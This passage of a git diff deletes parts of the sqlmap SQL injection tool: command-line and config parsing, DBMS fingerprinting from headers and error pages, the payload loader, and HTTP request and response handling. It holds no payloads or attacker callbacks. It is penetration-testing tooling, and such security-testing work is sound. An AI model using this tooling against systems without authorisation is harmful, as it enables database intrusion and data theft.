"clear"] - - for option in parser.option_list: - _.extend(option._long_opts) - _.extend(option._short_opts) - - for group in parser.option_groups: - for option in group.option_list: - _.extend(option._long_opts) - _.extend(option._short_opts) - - autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_) - - while True: - command = None - - try: - command = raw_input("sqlmap-shell> ").strip() - command = getUnicode(command, encoding=sys.stdin.encoding) - except 
(KeyboardInterrupt, EOFError): - print - raise SqlmapShellQuitException - - if not command: - continue - elif command.lower() == "clear": - clearHistory() - print "[i] history cleared" - saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) - elif command.lower() in ("x", "q", "exit", "quit"): - raise SqlmapShellQuitException - elif command[0] != '-': - print "[!] invalid option(s) provided" - print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'" - else: - saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) - loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) - break - - try: - for arg in shlex.split(command): - argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) - except ValueError, ex: - raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message - - # Hide non-basic options in basic help case - for i in xrange(len(argv)): - if argv[i] == "-hh": - argv[i] = "-h" - elif re.search(r"\A-\w=.+", argv[i]): - print "[!] potentially miswritten (illegal '=') short option detected ('%s')" % argv[i] - elif argv[i] == "-H": - if i + 1 < len(argv): - extraHeaders.append(argv[i + 1]) - elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]): - argv[i] = argv[i][:-1] - conf.skipThreadCheck = True - elif argv[i] == "--version": - print VERSION_STRING.split('/')[-1] - raise SystemExit - elif argv[i] == "-h": - advancedHelp = False - for group in parser.option_groups[:]: - found = False - for option in group.option_list: - if option.dest not in BASIC_HELP_ITEMS: - option.help = SUPPRESS_HELP - else: - found = True - if not found: - parser.option_groups.remove(group) - - try: - (args, _) = parser.parse_args(argv) - except UnicodeEncodeError, ex: - print "\n[!] %s" % ex.object.encode("unicode-escape") - raise SystemExit - except SystemExit: - if "-h" in argv and not advancedHelp: - print "\n[!] 
to see full list of options run with '-hh'" - raise - - if extraHeaders: - if not args.headers: - args.headers = "" - delimiter = "\\n" if "\\n" in args.headers else "\n" - args.headers += delimiter + delimiter.join(extraHeaders) - - # Expand given mnemonic options (e.g. -z "ign,flu,bat") - for i in xrange(len(argv) - 1): - if argv[i] == "-z": - expandMnemonics(argv[i + 1], parser, args) - - if args.dummy: - args.url = args.url or DUMMY_URL - - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ - args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.pickledOptions, args.sitemapUrl)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help" - parser.error(errMsg) - - return args - - except (OptionError, TypeError), e: - parser.error(e) - - except SystemExit: - # Protection against Windows dummy double clicking - if IS_WIN: - print "\nPress Enter to continue...", - raw_input() - raise - - debugMsg = "parsing command line" - logger.debug(debugMsg) diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py deleted file mode 100644 index ef6807b7..00000000 --- a/lib/parse/configfile.py +++ /dev/null @@ -1,98 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import checkFile -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import openFile -from lib.core.common import unArrayizeValue -from lib.core.common import UnicodeRawConfigParser -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception 
import SqlmapSyntaxException -from lib.core.optiondict import optDict - -config = None - -def configFileProxy(section, option, boolean=False, integer=False): - """ - Parse configuration file and save settings into the configuration - advanced dictionary. - """ - - global config - - if config.has_option(section, option): - try: - if boolean: - value = config.getboolean(section, option) if config.get(section, option) else False - elif integer: - value = config.getint(section, option) if config.get(section, option) else 0 - else: - value = config.get(section, option) - except ValueError, ex: - errMsg = "error occurred while processing the option " - errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex)) - raise SqlmapSyntaxException(errMsg) - - if value: - conf[option] = value - else: - conf[option] = None - else: - debugMsg = "missing requested option '%s' (section " % option - debugMsg += "'%s') into the configuration file, " % section - debugMsg += "ignoring. Skipping to next." - logger.debug(debugMsg) - -def configFileParser(configFile): - """ - Parse configuration file and save settings into the configuration - advanced dictionary. 
- """ - - global config - - debugMsg = "parsing configuration file" - logger.debug(debugMsg) - - checkFile(configFile) - configFP = openFile(configFile, "rb") - - try: - config = UnicodeRawConfigParser() - config.readfp(configFP) - except Exception, ex: - errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) - raise SqlmapSyntaxException(errMsg) - - if not config.has_section("Target"): - errMsg = "missing a mandatory section 'Target' in the configuration file" - raise SqlmapMissingMandatoryOptionException(errMsg) - - mandatory = False - - for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "sitemapUrl", "wizard"): - if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option): - mandatory = True - break - - if not mandatory: - errMsg = "missing a mandatory option in the configuration file " - errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)" - raise SqlmapMissingMandatoryOptionException(errMsg) - - for family, optionData in optDict.items(): - for option, datatype in optionData.items(): - datatype = unArrayizeValue(datatype) - - boolean = datatype == "boolean" - integer = datatype == "integer" - - configFileProxy(family, option, boolean, integer) diff --git a/lib/parse/handler.py b/lib/parse/handler.py deleted file mode 100644 index f7970465..00000000 --- a/lib/parse/handler.py +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from xml.sax.handler import ContentHandler -from lib.core.common import sanitizeStr - -class FingerprintHandler(ContentHandler): - """ - This class defines methods to parse and extract information from - the given DBMS banner based upon the data in XML file - """ - - def __init__(self, banner, info): - ContentHandler.__init__(self) - - 
self._banner = sanitizeStr(banner) - self._regexp = None - self._match = None - self._dbmsVersion = None - self._techVersion = None - self._info = info - - def _feedInfo(self, key, value): - value = sanitizeStr(value) - - if value in (None, "None"): - return - - if key == "dbmsVersion": - self._info[key] = value - else: - if key not in self._info.keys(): - self._info[key] = set() - - for _ in value.split("|"): - self._info[key].add(_) - - def startElement(self, name, attrs): - if name == "regexp": - self._regexp = sanitizeStr(attrs.get("value")) - _ = re.match("\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes - - if _ and _.group(0).lower() in self._banner.lower() or not _: - self._match = re.search(self._regexp, self._banner, re.I | re.M) - else: - self._match = None - - if name == "info" and self._match: - self._feedInfo("type", attrs.get("type")) - self._feedInfo("distrib", attrs.get("distrib")) - self._feedInfo("release", attrs.get("release")) - self._feedInfo("codename", attrs.get("codename")) - - self._dbmsVersion = sanitizeStr(attrs.get("dbms_version")) - self._techVersion = sanitizeStr(attrs.get("tech_version")) - self._sp = sanitizeStr(attrs.get("sp")) - - if self._dbmsVersion.isdigit(): - self._feedInfo("dbmsVersion", self._match.group(int(self._dbmsVersion))) - - if self._techVersion.isdigit(): - self._feedInfo("technology", "%s %s" % (attrs.get("technology"), self._match.group(int(self._techVersion)))) - else: - self._feedInfo("technology", attrs.get("technology")) - - if self._sp.isdigit(): - self._feedInfo("sp", "Service Pack %s" % int(self._sp)) - - self._regexp = None - self._match = None - self._dbmsVersion = None - self._techVersion = None diff --git a/lib/parse/headers.py b/lib/parse/headers.py deleted file mode 100644 index efc55156..00000000 --- a/lib/parse/headers.py +++ /dev/null @@ -1,42 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the 
file 'doc/COPYING' for copying permission -""" - -import itertools -import os - -from lib.core.common import parseXmlFile -from lib.core.data import kb -from lib.core.data import paths -from lib.parse.handler import FingerprintHandler - - -def headersParser(headers): - """ - This function calls a class that parses the input HTTP headers to - fingerprint the back-end database management system operating system - and the web application technology - """ - - if not kb.headerPaths: - kb.headerPaths = { - "cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), - "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), - "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), - "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"), - "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), - "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), - "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), - } - - for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): - value = headers[header] - xmlfile = kb.headerPaths[header] - - handler = FingerprintHandler(value, kb.headersFp) - - parseXmlFile(xmlfile, handler) - parseXmlFile(paths.GENERIC_XML, handler) diff --git a/lib/parse/html.py b/lib/parse/html.py deleted file mode 100644 index 92dad38b..00000000 --- a/lib/parse/html.py +++ /dev/null @@ -1,65 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from xml.sax.handler import ContentHandler - -from lib.core.common import parseXmlFile -from lib.core.data import kb -from lib.core.data import paths -from lib.core.threads import getCurrentThreadData - -class HTMLHandler(ContentHandler): - """ - This class defines methods to parse the input HTML page to - fingerprint the back-end 
database management system - """ - - def __init__(self, page): - ContentHandler.__init__(self) - - self._dbms = None - self._page = page - - self.dbms = None - - def _markAsErrorPage(self): - threadData = getCurrentThreadData() - threadData.lastErrorPage = (threadData.lastRequestUID, self._page) - - def startElement(self, name, attrs): - if name == "dbms": - self._dbms = attrs.get("value") - - elif name == "error": - if re.search(attrs.get("regexp"), self._page, re.I): - self.dbms = self._dbms - self._markAsErrorPage() - -def htmlParser(page): - """ - This function calls a class that parses the input HTML page to - fingerprint the back-end database management system - """ - - xmlfile = paths.ERRORS_XML - handler = HTMLHandler(page) - - parseXmlFile(xmlfile, handler) - - if handler.dbms and handler.dbms not in kb.htmlFp: - kb.lastParserStatus = handler.dbms - kb.htmlFp.append(handler.dbms) - else: - kb.lastParserStatus = None - - # generic SQL warning/error messages - if re.search(r"SQL (warning|error|syntax)", page, re.I): - handler._markAsErrorPage() - - return handler.dbms diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py deleted file mode 100644 index a453d7d6..00000000 --- a/lib/parse/payloads.py +++ /dev/null @@ -1,101 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from xml.etree import ElementTree as et - -from lib.core.common import getSafeExString -from lib.core.data import conf -from lib.core.data import paths -from lib.core.datatype import AttribDict -from lib.core.exception import SqlmapInstallationException - -def cleanupVals(text, tag): - if tag in ("clause", "where"): - text = text.split(',') - - if isinstance(text, basestring): - text = int(text) if text.isdigit() else text - - elif isinstance(text, list): - count = 0 - - for _ in text: - text[count] = int(_) if _.isdigit() else _ - count += 1 - - if len(text) == 1 
and tag not in ("clause", "where"): - text = text[0] - - return text - -def parseXmlNode(node): - for element in node.getiterator('boundary'): - boundary = AttribDict() - - for child in element.getchildren(): - if child.text: - values = cleanupVals(child.text, child.tag) - boundary[child.tag] = values - else: - boundary[child.tag] = None - - conf.boundaries.append(boundary) - - for element in node.getiterator('test'): - test = AttribDict() - - for child in element.getchildren(): - if child.text and child.text.strip(): - values = cleanupVals(child.text, child.tag) - test[child.tag] = values - else: - if len(child.getchildren()) == 0: - test[child.tag] = None - continue - else: - test[child.tag] = AttribDict() - - for gchild in child.getchildren(): - if gchild.tag in test[child.tag]: - prevtext = test[child.tag][gchild.tag] - test[child.tag][gchild.tag] = [prevtext, gchild.text] - else: - test[child.tag][gchild.tag] = gchild.text - - conf.tests.append(test) - -def loadBoundaries(): - try: - doc = et.parse(paths.BOUNDARIES_XML) - except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - - root = doc.getroot() - parseXmlNode(root) - -def loadPayloads(): - payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH) - payloadFiles.sort() - - for payloadFile in payloadFiles: - payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile) - - try: - doc = et.parse(payloadFilePath) - except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). 
Please make " % (payloadFilePath, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - - root = doc.getroot() - parseXmlNode(root) diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py deleted file mode 100644 index 237d28f2..00000000 --- a/lib/parse/sitemap.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import re - -from lib.core.common import readInput -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapSyntaxException -from lib.request.connect import Connect as Request -from thirdparty.oset.pyoset import oset - -abortedFlag = None - -def parseSitemap(url, retVal=None): - global abortedFlag - - if retVal is not None: - logger.debug("parsing sitemap '%s'" % url) - - try: - if retVal is None: - abortedFlag = False - retVal = oset() - - try: - content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" - except httplib.InvalidURL: - errMsg = "invalid URL given for sitemap ('%s')" % url - raise SqlmapSyntaxException, errMsg - - for match in re.finditer(r"\s*([^<]+)", content or ""): - if abortedFlag: - break - url = match.group(1).strip() - if url.endswith(".xml") and "sitemap" in url.lower(): - if kb.followSitemapRecursion is None: - message = "sitemap recursion detected. Do you want to follow? [y/N] " - test = readInput(message, default="N") - kb.followSitemapRecursion = test[0] in ("y", "Y") - if kb.followSitemapRecursion: - parseSitemap(url, retVal) - else: - retVal.add(url) - - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during sitemap parsing. 
sqlmap " - warnMsg += "will use partial list" - logger.warn(warnMsg) - - return retVal diff --git a/lib/request/__init__.py b/lib/request/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/request/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/request/basic.py b/lib/request/basic.py deleted file mode 100644 index 0c2557f6..00000000 --- a/lib/request/basic.py +++ /dev/null @@ -1,352 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import gzip -import logging -import re -import StringIO -import struct -import zlib - -from lib.core.common import extractErrorMessage -from lib.core.common import extractRegexResult -from lib.core.common import getPublicTypeMembers -from lib.core.common import getUnicode -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import resetCookieJar -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import HTTP_HEADER -from lib.core.enums import PLACE -from lib.core.exception import SqlmapCompressionException -from lib.core.settings import BLOCKED_IP_REGEX -from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from lib.core.settings import EVENTVALIDATION_REGEX -from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import META_CHARSET_REGEX -from lib.core.settings import PARSE_HEADERS_LIMIT -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import VIEWSTATE_REGEX -from lib.parse.headers import headersParser -from lib.parse.html import htmlParser -from lib.utils.htmlentities 
import htmlEntities -from thirdparty.chardet import detect -from thirdparty.odict.odict import OrderedDict - -def forgeHeaders(items=None): - """ - Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing - the HTTP requests - """ - - items = items or {} - - for _ in items.keys(): - if items[_] is None: - del items[_] - - headers = OrderedDict(conf.httpHeaders) - headers.update(items.items()) - - class _str(str): - def capitalize(self): - return _str(self) - - def title(self): - return _str(self) - - _ = headers - headers = OrderedDict() - for key, value in _.items(): - success = False - - for _ in headers: - if _.upper() == key.upper(): - del headers[_] - break - - if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)): - try: - headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455 - except UnicodeEncodeError: # don't do the hack on non-ASCII header names (they have to be properly encoded later on) - pass - else: - success = True - if not success: - key = '-'.join(_.capitalize() for _ in key.split('-')) - headers[key] = value - - if conf.cj: - if HTTP_HEADER.COOKIE in headers: - for cookie in conf.cj: - if cookie.domain_specified and not conf.hostname.endswith(cookie.domain): - continue - - if ("%s=" % cookie.name) in headers[HTTP_HEADER.COOKIE]: - if conf.loadCookies: - conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders)) - elif kb.mergeCookies is None: - message = "you provided a HTTP %s header value. " % HTTP_HEADER.COOKIE - message += "The target URL provided its own cookies within " - message += "the HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE - message += "Do you want to merge them in futher requests? 
[Y/n] " - _ = readInput(message, default="Y") - kb.mergeCookies = not _ or _[0] in ("y", "Y") - - if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: - _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (cookie.name, getUnicode(cookie.value))).replace('\\', r'\\'), x) - headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) - - if PLACE.COOKIE in conf.parameters: - conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE]) - - conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] - - elif not kb.testMode: - headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value)) - - if kb.testMode and not any((conf.csrfToken, conf.safeUrl)): - resetCookieJar(conf.cj) - - return headers - -def parseResponse(page, headers): - """ - @param page: the page to parse to feed the knowledge base htmlFp - (back-end DBMS fingerprint based upon DBMS error messages return - through the web application) list and absFilePaths (absolute file - paths) set. 
- """ - - if headers: - headersParser(headers) - - if page: - htmlParser(page) - -def checkCharEncoding(encoding, warn=True): - """ - Checks encoding name, repairs common misspellings and adjusts to - proper namings used in codecs module - - >>> checkCharEncoding('iso-8858', False) - 'iso8859-1' - >>> checkCharEncoding('en_us', False) - 'utf8' - """ - - if encoding: - encoding = encoding.lower() - else: - return encoding - - # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"} - - for delimiter in (';', ',', '('): - if delimiter in encoding: - encoding = encoding[:encoding.find(delimiter)].strip() - - encoding = encoding.replace(""", "") - - # popular typos/errors - if "8858" in encoding: - encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 - elif "8559" in encoding: - encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 - elif "5889" in encoding: - encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 - elif "5589" in encoding: - encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 - elif "2313" in encoding: - encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312 - elif encoding.startswith("x-"): - encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish - elif "windows-cp" in encoding: - encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 - - # name adjustment for compatibility - if encoding.startswith("8859"): - encoding = "iso-%s" % encoding - elif encoding.startswith("cp-"): - encoding = "cp%s" % encoding[3:] - elif encoding.startswith("euc-"): - encoding = "euc_%s" % encoding[4:] - elif encoding.startswith("windows") and not 
encoding.startswith("windows-"): - encoding = "windows-%s" % encoding[7:] - elif encoding.find("iso-88") > 0: - encoding = encoding[encoding.find("iso-88"):] - elif encoding.startswith("is0-"): - encoding = "iso%s" % encoding[4:] - elif encoding.find("ascii") > 0: - encoding = "ascii" - elif encoding.find("utf8") > 0: - encoding = "utf8" - elif encoding.find("utf-8") > 0: - encoding = "utf-8" - - # Reference: http://philip.html5.org/data/charsets-2.html - if encoding in translate: - encoding = translate[encoding] - elif encoding in ("null", "{charset}", "*") or not re.search(r"\w", encoding): - return None - - # Reference: http://www.iana.org/assignments/character-sets - # Reference: http://docs.python.org/library/codecs.html - try: - codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding) - except (LookupError, ValueError): - if warn: - warnMsg = "unknown web page charset '%s'. " % encoding - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" - singleTimeLogMessage(warnMsg, logging.WARN, encoding) - encoding = None - - if encoding: - try: - unicode(randomStr(), encoding) - except: - if warn: - warnMsg = "invalid web page charset '%s'" % encoding - singleTimeLogMessage(warnMsg, logging.WARN, encoding) - encoding = None - - return encoding - -def getHeuristicCharEncoding(page): - """ - Returns page encoding charset detected by usage of heuristics - Reference: http://chardet.feedparser.org/docs/ - """ - retVal = detect(page)["encoding"] - - if retVal: - infoMsg = "heuristics detected web page charset '%s'" % retVal - singleTimeLogMessage(infoMsg, logging.INFO, retVal) - - return retVal - -def decodePage(page, contentEncoding, contentType): - """ - Decode compressed/charset HTTP response - """ - - if not page or (conf.nullConnection and len(page) < 2): - return getUnicode(page) - - if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"): - if not kb.pageCompress: - return 
None - - try: - if contentEncoding.lower() == "deflate": - data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations - else: - data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page)) - size = struct.unpack(" MAX_CONNECTION_TOTAL_SIZE: - raise Exception("size too large") - - page = data.read() - except Exception, msg: - errMsg = "detected invalid data for declared content " - errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg) - singleTimeLogMessage(errMsg, logging.ERROR) - - warnMsg = "turning off page compression" - singleTimeWarnMessage(warnMsg) - - kb.pageCompress = False - raise SqlmapCompressionException - - if not conf.charset: - httpCharset, metaCharset = None, None - - # Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode - if contentType and (contentType.find("charset=") != -1): - httpCharset = checkCharEncoding(contentType.split("charset=")[-1]) - - metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page)) - - if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\ - or (httpCharset == metaCharset and all((httpCharset, metaCharset))): - kb.pageEncoding = httpCharset or metaCharset # Reference: http://bytes.com/topic/html-css/answers/154758-http-equiv-vs-true-header-has-precedence - debugMsg = "declared web page charset '%s'" % kb.pageEncoding - singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg) - else: - kb.pageEncoding = None - else: - kb.pageEncoding = conf.charset - - # can't do for all responses because we need to support binary files too - if contentType and not isinstance(page, unicode) and "text/" in contentType.lower(): - if kb.heuristicMode: - kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) - page = getUnicode(page, kb.pageEncoding) - else: - # e.g. 
Ãëàâà - if "&#" in page: - page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page) - - # e.g. %20%28%29 - if "%" in page: - page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page) - - # e.g. & - page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page) - - kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) - page = getUnicode(page, kb.pageEncoding) - - # e.g. ’…™ - if "&#" in page: - def _(match): - retVal = match.group(0) - try: - retVal = unichr(int(match.group(1))) - except ValueError: - pass - return retVal - page = re.sub(r"&#(\d+);", _, page) - - # e.g. ζ - page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page) - - return page - -def processResponse(page, responseHeaders): - kb.processResponseCounter += 1 - - page = page or "" - - parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None) - - if conf.parseErrors: - msg = extractErrorMessage(page) - - if msg: - logger.warning("parsed DBMS error message: '%s'" % msg) - - if kb.originalPage is None: - for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX): - match = re.search(regex, page) - if match and PLACE.POST in conf.parameters: - name, value = match.groups() - if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]: - if conf.paramDict[PLACE.POST][name] in page: - continue - conf.paramDict[PLACE.POST][name] = value - conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST]) - - if re.search(BLOCKED_IP_REGEX, page): - errMsg = "it appears that you have been blocked by the target server" - singleTimeLogMessage(errMsg, logging.ERROR) diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py deleted file mode 100644 index 
89ec252b..00000000 --- a/lib/request/basicauthhandler.py +++ /dev/null @@ -1,39 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import urllib2 - -class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler): - """ - Reference: http://selenic.com/hg/rev/6c51a5056020 - Fix for a: http://bugs.python.org/issue8797 - """ - def __init__(self, *args, **kwargs): - urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) - self.retried_req = set() - self.retried_count = 0 - - def reset_retry_count(self): - # Python 2.6.5 will call this on 401 or 407 errors and thus loop - # forever. We disable reset_retry_count completely and reset in - # http_error_auth_reqed instead. - pass - - def http_error_auth_reqed(self, auth_header, host, req, headers): - # Reset the retry counter once for each request. - if hash(req) not in self.retried_req: - self.retried_req.add(hash(req)) - self.retried_count = 0 - else: - if self.retried_count > 5: - raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", - headers, None) - else: - self.retried_count += 1 - - return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed( - self, auth_header, host, req, headers) diff --git a/lib/request/comparison.py b/lib/request/comparison.py deleted file mode 100644 index baba2249..00000000 --- a/lib/request/comparison.py +++ /dev/null @@ -1,183 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import extractRegexResult -from lib.core.common import getFilteredPageContent -from lib.core.common import listToStrValue -from lib.core.common import removeDynamicContent -from lib.core.common import wasLastResponseDBMSError -from lib.core.common import wasLastResponseHTTPError -from lib.core.data import conf -from lib.core.data import kb -from 
lib.core.data import logger -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import DEFAULT_PAGE_ENCODING -from lib.core.settings import DIFF_TOLERANCE -from lib.core.settings import HTML_TITLE_REGEX -from lib.core.settings import MIN_RATIO -from lib.core.settings import MAX_RATIO -from lib.core.settings import REFLECTED_VALUE_MARKER -from lib.core.settings import LOWER_RATIO_BOUND -from lib.core.settings import UPPER_RATIO_BOUND -from lib.core.threads import getCurrentThreadData - -def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): - _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue) - return _ - -def _adjust(condition, getRatioValue): - if not any((conf.string, conf.notString, conf.regexp, conf.code)): - # Negative logic approach is used in raw page comparison scheme as that what is "different" than original - # PAYLOAD.WHERE.NEGATIVE response is considered as True; in switch based approach negative logic is not - # applied as that what is by user considered as True is that what is returned by the comparison mechanism - # itself - retVal = not condition if kb.negativeLogic and condition is not None and not getRatioValue else condition - else: - retVal = condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO) - - return retVal - -def _comparison(page, headers, code, getRatioValue, pageLength): - threadData = getCurrentThreadData() - - if kb.testMode: - threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" - threadData.lastComparisonPage = page - - if page is None and pageLength is None: - return None - - count = 0 - - seqMatcher = threadData.seqMatcher - seqMatcher.set_seq1(kb.pageTemplate) - - if any((conf.string, conf.notString, conf.regexp)): - rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) - - # String to match in page when the query is True and/or valid - if conf.string: - 
